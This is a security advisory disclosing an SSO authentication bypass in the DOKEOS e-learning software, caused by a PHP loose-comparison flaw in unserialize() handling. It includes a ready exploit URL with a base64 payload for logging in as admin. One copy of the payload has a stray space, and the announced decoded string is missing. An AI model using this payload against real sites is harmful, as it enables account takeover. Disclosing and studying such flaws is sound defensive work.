Total Tests:

SSO Authentication Bypass and Website Takeover in DOKEOS

Advisory ID:HTB23289
Vulnerable Versions:ce30 and probably prior
Tested Version:ce30
Advisory Publication:January 7, 2016 [without technical details]
Vendor Notification:January 7, 2016
Public Disclosure:February 17, 2016
Vulnerability Type:Improper Authentication [CWE-287]
CVE Reference:Pending
Risk Level:High
CVSSv2 Base Score:7.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
Discovered and Provided:High-Tech Bridge Security Research Lab

Advisory Details:

High-Tech Bridge Security Research Lab discovered a high-risk vulnerability in a popular e-learning software DOKEOS. A remote unauthenticated attacker can bypass authentication process and login to the vulnerable website with an arbitrary account (including administrator's one). Successful exploitation requires Single Sign-On (SSO) authentication to be enabled.

The vulnerability is caused by variable type confusion error when comparing password hash to unserialized string during authentication process, when SSO authentication is enabled (sso_authentication=true). In this case, the application uses HTTP GET "sso_cookie" parameter to pass base64-encoded login and password and then calls 'unserialize()' PHP function on received data.

Below is an example of vulnerable code, which erroneously uses the "==" operator to compare two strings (instead of the "===" operator):
if ($sso['secret'] == sha1($uData['password']) && ($sso['username'] == $uData['username'])) {

In this case, SHA1 password hash is compared to $sso['secret'] string, controlled by the attacker. If attacker passes Boolean true instead of the real password, he can successfully bypass the authentication and login under arbitrary web application account.

A simple exploit below can be used to authenticate under "admin" account:
http://[host]/index.php?loginFailed=1&sso_referer=&sso_cookie=YToyOntzOjg6In VzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjY6InNlY3JldCI7YjoxO30=

The "YToyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjY6InNlY3JldCI7YjoxO30=" string is translated from base64 into:

After the execution of 'unserialize()' function, we have the following array:
$sso['username'] = 'admin';
$sso['secret'] = true;

How to Detect Improper Authentication Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Disclosure timeline:
2016-01-07 Vendor notified via contact form, no reply.
2016-01-13 Vendor notified via contact form, emails and twitter, no reply.
2016-01-20 Vendor notified via contact form and emails, no reply.
2016-01-27 Fix Requested via contact form and emails, no reply.
2016-02-03 Fix Requested via contact form and emails, no reply.
2016-02-17 Public disclosure.

Currently we are not aware of any official solution for this vulnerability.

[1] High-Tech Bridge Advisory HTB23289 - - SSO Auth Bypass and Website Takeover in DOKEOS
[2] DOKEOS - - E-LEARNING suite and LMS for growing companies
[3] Common Weakness Enumeration (CWE) - - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - Leveraging the power of machine-learning and genius of human brain to deliver the most advanced web application security and penetration testing.
[5] ImmuniWeb® SSLScan - Test your servers for security and compliance with PCI DSS, HIPAA and NIST.
Related Security Advisories: HTB23181: SQL Injection in Dokeos

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Talk to ImmuniWeb Experts
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
Your data will stay private and confidential